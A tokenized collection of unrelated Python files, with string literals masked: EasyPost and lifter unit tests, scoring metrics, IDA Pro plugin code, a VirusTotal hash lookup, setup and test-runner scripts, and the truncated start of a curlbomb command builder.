<s> import unittest <EOL> import easypost <EOL> from constants import API_KEY as api_key <EOL> easypost . api_key = api_key <EOL> class UserTests ( unittest . TestCase ) : <EOL> def test_child_user_create ( self ) : <EOL> easypost . api_key = "<STR_LIT>" <EOL> child_user = easypost . User . create ( <EOL> name = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> password_confirmation = '<STR_LIT>' , <EOL> ) <EOL> child_id = child_user . id <EOL> assert child_id is not None <EOL> retrieved_user = easypost . User . retrieve ( child_id ) <EOL> assert retrieved_user . id == child_id <EOL> assert retrieved_user . name == '<STR_LIT>' <EOL> new_name = '<STR_LIT>' <EOL> retrieved_user . name = new_name <EOL> retrieved_user . save ( ) <EOL> updated_user = easypost . User . retrieve ( child_id ) <EOL> assert updated_user . id == child_id <EOL> assert updated_user . name == '<STR_LIT>' <EOL> easypost . api_key = api_key <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals <EOL> import logging <EOL> import numpy as np <EOL> from scipy . stats import kendalltau , spearmanr , pearsonr <EOL> from six import string_types <EOL> from six . moves import xrange as range <EOL> from sklearn . metrics import confusion_matrix , f1_score , SCORERS <EOL> _CORRELATION_METRICS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def kappa ( y_true , y_pred , weights = None , allow_off_by_one = False ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ ) <EOL> assert ( len ( y_true ) == len ( y_pred ) ) <EOL> try : <EOL> y_true = [ int ( np . round ( float ( y ) ) ) for y in y_true ] <EOL> y_pred = [ int ( np . round ( float ( y ) ) ) for y in y_pred ] <EOL> except ValueError as e : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise e <EOL> min_rating = min ( min ( y_true ) , min ( y_pred ) ) <EOL> max_rating = max ( max ( y_true ) , max ( y_pred ) ) <EOL> y_true = [ y - min_rating for y in y_true ] <EOL> y_pred = [ y - min_rating for y in y_pred ] <EOL> num_ratings = max_rating - min_rating + <NUM_LIT:1> <EOL> observed = confusion_matrix ( y_true , y_pred , <EOL> labels = list ( range ( num_ratings ) ) ) <EOL> num_scored_items = float ( len ( y_true ) ) <EOL> if isinstance ( weights , string_types ) : <EOL> wt_scheme = weights <EOL> weights = None <EOL> else : <EOL> wt_scheme = '<STR_LIT>' <EOL> if weights is None : <EOL> weights = np . 
empty ( ( num_ratings , num_ratings ) ) <EOL> for i in range ( num_ratings ) : <EOL> for j in range ( num_ratings ) : <EOL> diff = abs ( i - j ) <EOL> if allow_off_by_one and diff : <EOL> diff -= <NUM_LIT:1> <EOL> if wt_scheme == '<STR_LIT>' : <EOL> weights [ i , j ] = diff <EOL> elif wt_scheme == '<STR_LIT>' : <EOL> weights [ i , j ] = diff ** <NUM_LIT:2> <EOL> elif not wt_scheme : <EOL> weights [ i , j ] = bool ( diff ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( wt_scheme ) ) <EOL> hist_true = np . bincount ( y_true , minlength = num_ratings ) <EOL> hist_true = hist_true [ : num_ratings ] / num_scored_items <EOL> hist_pred = np . bincount ( y_pred , minlength = num_ratings ) <EOL> hist_pred = hist_pred [ : num_ratings ] / num_scored_items <EOL> expected = np . outer ( hist_true , hist_pred ) <EOL> observed = observed / num_scored_items <EOL> k = <NUM_LIT:1.0> <EOL> if np . count_nonzero ( weights ) : <EOL> k -= ( sum ( sum ( weights * observed ) ) / sum ( sum ( weights * expected ) ) ) <EOL> return k <EOL> def kendall_tau ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = kendalltau ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def spearman ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = spearmanr ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def pearson ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> ret_score = pearsonr ( y_true , y_pred ) [ <NUM_LIT:0> ] <EOL> return ret_score if not np . isnan ( ret_score ) else <NUM_LIT:0.0> <EOL> def f1_score_least_frequent ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> least_frequent = np . bincount ( y_true ) . 
argmin ( ) <EOL> return f1_score ( y_true , y_pred , average = None ) [ least_frequent ] <EOL> def use_score_func ( func_name , y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> scorer = SCORERS [ func_name ] <EOL> return scorer . _sign * scorer . _score_func ( y_true , y_pred , ** scorer . _kwargs ) </s>
<s> from idaapi import PluginForm <EOL> from PySide import QtGui , QtCore <EOL> class MyPluginFormClass ( PluginForm ) : <EOL> def OnCreate ( self , form ) : <EOL> """<STR_LIT>""" <EOL> self . parent = self . FormToPySideWidget ( form ) <EOL> self . PopulateForm ( ) <EOL> def PopulateForm ( self ) : <EOL> layout = QtGui . QVBoxLayout ( ) <EOL> layout . addWidget ( <EOL> QtGui . QLabel ( "<STR_LIT>" ) ) <EOL> layout . addWidget ( <EOL> QtGui . QLabel ( "<STR_LIT>" ) ) <EOL> self . parent . setLayout ( layout ) <EOL> def OnClose ( self , form ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> plg = MyPluginFormClass ( ) <EOL> plg . Show ( "<STR_LIT>" ) </s>
<s> class BasicBlock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , bb , fc ) : <EOL> self . _fc = fc <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . startEA = bb . startEA <EOL> """<STR_LIT>""" <EOL> self . endEA = bb . endEA <EOL> """<STR_LIT>""" <EOL> self . type = self . _fc . _q . calc_block_type ( self . id ) <EOL> """<STR_LIT>""" <EOL> def preds ( self ) : <EOL> """<STR_LIT>""" <EOL> q = self . _fc . _q <EOL> for i in xrange ( <NUM_LIT:0> , self . _fc . _q . npred ( self . id ) ) : <EOL> yield self . _fc [ q . pred ( self . id , i ) ] <EOL> def succs ( self ) : <EOL> """<STR_LIT>""" <EOL> q = self . _fc . _q <EOL> for i in xrange ( <NUM_LIT:0> , q . nsucc ( self . id ) ) : <EOL> yield self . _fc [ q . succ ( self . id , i ) ] <EOL> class FlowChart ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , f = None , bounds = None , flags = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if ( f is None ) and ( bounds is None or type ( bounds ) != types . TupleType ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if bounds is None : <EOL> bounds = ( BADADDR , BADADDR ) <EOL> self . _q = qflow_chart_t ( "<STR_LIT>" , f , bounds [ <NUM_LIT:0> ] , bounds [ <NUM_LIT:1> ] , flags ) <EOL> size = property ( lambda self : self . _q . size ( ) ) <EOL> """<STR_LIT>""" <EOL> def refresh ( ) : <EOL> """<STR_LIT>""" <EOL> self . _q . refresh ( ) <EOL> def _getitem ( self , index ) : <EOL> return BasicBlock ( index , self . _q [ index ] , self ) <EOL> def __iter__ ( self ) : <EOL> return ( self . _getitem ( index ) for index in xrange ( <NUM_LIT:0> , self . size ) ) <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if index >= self . size : <EOL> raise KeyError <EOL> else : <EOL> return self . _getitem ( index ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import string <EOL> def random_string ( random_length = None ) : <EOL> """<STR_LIT>""" <EOL> choices = string . letters + '<STR_LIT:U+0020>' <EOL> text = [ ] <EOL> if not random_length : <EOL> random_length = random . randint ( <NUM_LIT:1> , <NUM_LIT:30> ) <EOL> for x in range ( random_length ) : <EOL> text . append ( random . choice ( choices ) ) <EOL> return "<STR_LIT>" . join ( text ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> import sys , os <EOL> sys . path . append ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> try : <EOL> from django . conf import settings <EOL> from tests import settings as test_settings <EOL> settings . configure ( default_settings = test_settings ) <EOL> try : <EOL> import django <EOL> setup = django . setup <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> setup ( ) <EOL> from django_nose import NoseTestSuiteRunner <EOL> except ImportError : <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> import logging <EOL> logging . disable ( logging . WARNING ) <EOL> logging . captureWarnings ( True ) <EOL> def run_tests ( * test_args ) : <EOL> if not test_args : <EOL> test_args = [ '<STR_LIT>' ] <EOL> test_runner = NoseTestSuiteRunner ( verbosity = <NUM_LIT:1> ) <EOL> failures = test_runner . run_tests ( test_args ) <EOL> if failures : <EOL> sys . exit ( failures ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run_tests ( * sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> import random <EOL> import sys <EOL> import unittest <EOL> import lifter . models <EOL> class TestObject ( object ) : <EOL> def __init__ ( self , name , ** kwargs ) : <EOL> self . name = name <EOL> for key , value in kwargs . items ( ) : <EOL> setattr ( self , key , value ) <EOL> def __repr__ ( self ) : <EOL> return self . name <EOL> class TestBase ( unittest . TestCase ) : <EOL> PARENTS = [ <EOL> TestObject ( name = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' ) , <EOL> ] <EOL> OBJECTS = [ <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:2> , a = <NUM_LIT:1> , parent = PARENTS [ <NUM_LIT:0> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:3> , a = <NUM_LIT:1> , parent = PARENTS [ <NUM_LIT:0> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:1> , a = <NUM_LIT:2> , parent = PARENTS [ <NUM_LIT:1> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> TestObject ( name = '<STR_LIT>' , order = <NUM_LIT:4> , a = <NUM_LIT:2> , parent = PARENTS [ <NUM_LIT:1> ] , label = '<STR_LIT>' , surname = '<STR_LIT>' ) , <EOL> ] <EOL> DICTS = [ o . __dict__ for o in OBJECTS ] <EOL> def setUp ( self ) : <EOL> self . manager = lifter . load ( self . OBJECTS ) <EOL> self . dict_manager = lifter . load ( self . DICTS ) <EOL> class TestQueries ( TestBase ) : <EOL> def test_default_order ( self ) : <EOL> self . assertEqual ( list ( self . manager . all ( ) ) , self . OBJECTS ) <EOL> self . assertEqual ( list ( self . dict_manager . all ( ) ) , self . DICTS ) <EOL> def test_can_get_using_attribute ( self ) : <EOL> self . assertEqual ( self . manager . all ( ) . get ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( self . dict_manager . all ( ) . get ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:0> ] ) <EOL> def test_can_filter ( self ) : <EOL> self . assertEqual ( self . manager . 
filter ( a = <NUM_LIT:1> ) , self . OBJECTS [ : <NUM_LIT:2> ] ) <EOL> def test_can_combine_filters ( self ) : <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> , name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . filter ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> , name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . filter ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <EOL> def test_related_lookups ( self ) : <EOL> self . assertEqual ( self . manager . filter ( parent__name = '<STR_LIT>' ) , self . OBJECTS [ : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . exclude ( parent__name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . manager . all ( ) . get ( parent__name = '<STR_LIT>' , order = <NUM_LIT:2> ) , self . OBJECTS [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( parent__name = '<STR_LIT>' ) , self . DICTS [ : <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( parent__name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . dict_manager . all ( ) . get ( parent__name = '<STR_LIT>' , order = <NUM_LIT:2> ) , self . DICTS [ <NUM_LIT:0> ] ) <EOL> def test_exception_raised_on_missing_attr ( self ) : <EOL> with self . assertRaises ( lifter . exceptions . MissingAttribute ) : <EOL> self . manager . filter ( x = "<STR_LIT:y>" ) . count ( ) <EOL> with self . assertRaises ( lifter . exceptions . MissingAttribute ) : <EOL> self . dict_manager . filter ( x = "<STR_LIT:y>" ) . count ( ) <EOL> def test_can_exclude ( self ) : <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:1> ) , self . 
OBJECTS [ <NUM_LIT:2> : ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:1> ) , self . DICTS [ <NUM_LIT:2> : ] ) <EOL> def test_can_combine_exclude ( self ) : <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:1> ) . exclude ( name = '<STR_LIT>' ) , self . OBJECTS [ <NUM_LIT:2> : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . manager . exclude ( a = <NUM_LIT:2> , name = '<STR_LIT>' ) , self . OBJECTS [ : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:1> ) . exclude ( name = '<STR_LIT>' ) , self . DICTS [ <NUM_LIT:2> : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( self . dict_manager . exclude ( a = <NUM_LIT:2> , name = '<STR_LIT>' ) , self . DICTS [ : <NUM_LIT:3> ] ) <EOL> def test_can_count ( self ) : <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . count ( ) , <NUM_LIT:2> ) <EOL> def test_first ( self ) : <EOL> self . assertIsNone ( self . manager . filter ( a = <NUM_LIT> ) . first ( ) ) <EOL> self . assertIsNotNone ( self . manager . filter ( a = <NUM_LIT:1> ) . first ( ) ) <EOL> self . assertIsNone ( self . dict_manager . filter ( a = <NUM_LIT> ) . first ( ) ) <EOL> self . assertIsNotNone ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . first ( ) ) <EOL> def test_ordering ( self ) : <EOL> self . assertEqual ( self . manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . OBJECTS [ <NUM_LIT:2> ] , self . OBJECTS [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . OBJECTS [ <NUM_LIT:3> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> self . assertEqual ( self . dict_manager . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . DICTS [ <NUM_LIT:2> ] , self . DICTS [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . dict_manager . 
order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:1> ] ] ) <EOL> @ unittest . skip ( '<STR_LIT>' ) <EOL> def test_random_ordering ( self ) : <EOL> is_py3 = sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> random_ordered_0 = self . dict_manager . order_by ( '<STR_LIT:?>' ) [ : <NUM_LIT:2> ] <EOL> if is_py3 : <EOL> self . assertEqual ( random_ordered_0 , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:1> ] ] ) <EOL> else : <EOL> self . assertEqual ( random_ordered_0 , [ self . DICTS [ <NUM_LIT:3> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> random . seed ( <NUM_LIT:1> ) <EOL> random_ordered_1 = self . dict_manager . order_by ( '<STR_LIT:?>' ) [ : <NUM_LIT:2> ] <EOL> if is_py3 : <EOL> self . assertEqual ( random_ordered_1 , [ self . DICTS [ <NUM_LIT:1> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> else : <EOL> self . assertEqual ( random_ordered_1 , [ self . DICTS [ <NUM_LIT:0> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> self . assertNotEqual ( random_ordered_0 , random_ordered_1 ) <EOL> def test_last ( self ) : <EOL> self . assertIsNone ( self . manager . filter ( a = <NUM_LIT> ) . last ( ) ) <EOL> self . assertIsNotNone ( self . manager . filter ( a = <NUM_LIT:1> ) . last ( ) ) <EOL> self . assertIsNone ( self . dict_manager . filter ( a = <NUM_LIT> ) . last ( ) ) <EOL> self . assertIsNotNone ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . last ( ) ) <EOL> def test_exists ( self ) : <EOL> self . assertFalse ( self . manager . filter ( a = <NUM_LIT> ) . exists ( ) ) <EOL> self . assertTrue ( self . manager . filter ( a = <NUM_LIT:1> ) . exists ( ) ) <EOL> self . assertFalse ( self . dict_manager . filter ( a = <NUM_LIT> ) . exists ( ) ) <EOL> self . assertTrue ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . exists ( ) ) <EOL> def test_get_raise_exception_on_multiple_objects_returned ( self ) : <EOL> with self . assertRaises ( lifter . 
MultipleObjectsReturned ) : <EOL> self . manager . all ( ) . get ( a = <NUM_LIT:1> ) <EOL> with self . assertRaises ( lifter . MultipleObjectsReturned ) : <EOL> self . dict_manager . all ( ) . get ( a = <NUM_LIT:1> ) <EOL> def test_get_raise_exception_on_does_not_exist ( self ) : <EOL> with self . assertRaises ( lifter . DoesNotExist ) : <EOL> self . manager . all ( ) . get ( a = <NUM_LIT> ) <EOL> with self . assertRaises ( lifter . DoesNotExist ) : <EOL> self . dict_manager . all ( ) . get ( a = <NUM_LIT> ) <EOL> def test_can_filter_using_callable ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lambda v : v in [ <NUM_LIT:1> , <NUM_LIT:3> ] ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> self . assertEqual ( self . dict_manager . filter ( order = lambda v : v in [ <NUM_LIT:1> , <NUM_LIT:3> ] ) , [ self . DICTS [ <NUM_LIT:1> ] , self . DICTS [ <NUM_LIT:2> ] ] ) <EOL> def test_values ( self ) : <EOL> expected = [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> } , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' ) , expected ) <EOL> expected = [ <EOL> { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> def test_values_list ( self ) : <EOL> expected = [ <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , flat = True ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . 
values_list ( '<STR_LIT>' , flat = True ) , expected ) <EOL> expected = [ <EOL> ( <NUM_LIT:2> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> ] <EOL> self . assertEqual ( self . manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> self . assertEqual ( self . dict_manager . filter ( a = <NUM_LIT:1> ) . values_list ( '<STR_LIT>' , '<STR_LIT:a>' ) , expected ) <EOL> def test_distinct ( self ) : <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT:a>' , flat = True ) , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT:a>' , flat = True ) . distinct ( ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . assertEqual ( self . manager . all ( ) . values_list ( '<STR_LIT>' , flat = True ) . distinct ( ) , self . PARENTS ) <EOL> class TestLookups ( TestBase ) : <EOL> def test_gt ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . gt ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_gte ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . gte ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_lt ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . lt ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_lte ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . lte ( <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_startswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . startswith ( '<STR_LIT:a>' ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . 
OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_endswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . endswith ( '<STR_LIT:s>' ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_value_in ( self ) : <EOL> self . assertEqual ( self . manager . filter ( label = lifter . lookups . value_in ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_range ( self ) : <EOL> self . assertEqual ( self . manager . filter ( order = lifter . lookups . value_range ( <NUM_LIT:2> , <NUM_LIT:3> ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:1> ] ] ) <EOL> def test_istartswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . istartswith ( '<STR_LIT:c>' ) ) , [ self . OBJECTS [ <NUM_LIT:1> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_iendswith ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . iendswith ( '<STR_LIT:t>' ) ) , [ self . OBJECTS [ <NUM_LIT:0> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> def test_contains ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . contains ( '<STR_LIT>' ) ) , [ self . OBJECTS [ <NUM_LIT:2> ] ] ) <EOL> def test_icontains ( self ) : <EOL> self . assertEqual ( self . manager . filter ( surname = lifter . lookups . icontains ( '<STR_LIT>' ) ) , [ self . OBJECTS [ <NUM_LIT:2> ] , self . OBJECTS [ <NUM_LIT:3> ] ] ) <EOL> class TestAggregation ( TestBase ) : <EOL> def test_sum ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Sum ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:6> } ) <EOL> self . assertEqual ( self . manager . aggregate ( total = lifter . Sum ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:6> } ) <EOL> def test_min ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . 
Min ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> def test_max ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Max ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> def test_avg ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Avg ( '<STR_LIT:a>' ) ) , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> def test_flat ( self ) : <EOL> self . assertEqual ( self . manager . aggregate ( lifter . Avg ( '<STR_LIT:a>' ) , flat = True ) , [ <NUM_LIT> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> sys . exit ( unittest . main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import hashlib <EOL> import requests <EOL> def META_VT_INSPECT ( s , buff ) : <EOL> md5 = hashlib . md5 ( buff ) . hexdigest ( ) <EOL> params = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : md5 } <EOL> base_uri = '<STR_LIT>' <EOL> response = requests . get ( '<STR_LIT>' % ( base_uri , '<STR_LIT>' ) , params = params ) <EOL> response_json = response . json ( ) <EOL> return response_json <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print META_VT_INSPECT ( None , sys . stdin . read ( ) ) </s>
<s> __version__ = '<STR_LIT>' <EOL> from prophet . app import Prophet </s>
<s> import shutil <EOL> import sys <EOL> import os , os . path <EOL> import imp <EOL> import blogofile . main <EOL> from blogofile import argparse <EOL> def setup ( parent_parser , parser_template ) : <EOL> from . import __dist__ <EOL> cmd_subparsers = parent_parser . add_subparsers ( ) <EOL> command1 = cmd_subparsers . add_parser ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , parents = [ parser_template ] ) <EOL> command1 . add_argument ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> command1 . set_defaults ( func = do_command1 ) <EOL> command2 = cmd_subparsers . add_parser ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , parents = [ parser_template ] ) <EOL> command2 . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> command2 . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> nargs = "<STR_LIT:?>" , default = "<STR_LIT>" ) <EOL> command2 . set_defaults ( func = do_command2 ) <EOL> def do_command1 ( args ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> if args . extra_coolness : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def do_command2 ( args ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" . format ( args . ARG1 ) ) <EOL> print ( "<STR_LIT>" . format ( args . ARG2 ) ) </s>
<s> import sys <EOL> import logging <EOL> import socket <EOL> import base64 <EOL> import random <EOL> import shlex <EOL> from . import run <EOL> from . import tls <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> from . argparser import argparser <EOL> def get_curlbomb_command ( settings , unwrapped = None ) : <EOL> """<STR_LIT>""" <EOL> pin_settings = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) and settings [ '<STR_LIT>' ] is not False and settings [ '<STR_LIT>' ] is True : <EOL> pin_settings = "<STR_LIT>" . format ( settings [ '<STR_LIT>' ] ) <EOL> if ( settings [ '<STR_LIT>' ] and unwrapped is not False ) or unwrapped is True : <EOL> knock = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings . get ( '<STR_LIT>' , False ) : <EOL> k = "<STR_LIT>" <EOL> else : <EOL> k = settings [ '<STR_LIT>' ] <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> knock = 